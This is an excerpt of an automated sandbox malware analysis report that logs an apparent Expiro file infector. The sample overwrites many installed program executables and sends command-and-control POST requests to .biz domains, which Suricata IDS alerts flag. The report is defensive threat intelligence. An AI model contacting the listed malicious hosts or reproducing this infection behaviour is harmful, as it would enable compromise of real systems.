                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\Locator.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_0046445A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C6D1 FindFirstFileW,FindClose,1_2_0046C6D1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0046C75C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0046EF95
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0046F0F2
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0046F3F3
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_004637EF
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00463B12
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0046BCBC
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_0276DD30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04EA87E1h5_2_04EA8530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04EA8F37h5_2_04EA8B08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04EA8F37h5_2_04EA8E64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h15_2_02BCDD30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053C87E1h15_2_053C8530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053C8F37h15_2_053C8B18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053C8F37h15_2_053C8E64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053C8F37h15_2_053C8B08

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:62334 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49744 -> 54.244.188.177:80
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49790 -> 82.112.184.197:80
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:52629 -> 1.1.1.1:53
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                  Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49737
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49737
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49731
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49731
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49734
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49734
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49881
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49881
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49872
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49872
                  Source: global trafficHTTP traffic detected: POST /lf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /aah HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /hluumowlkjhsxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
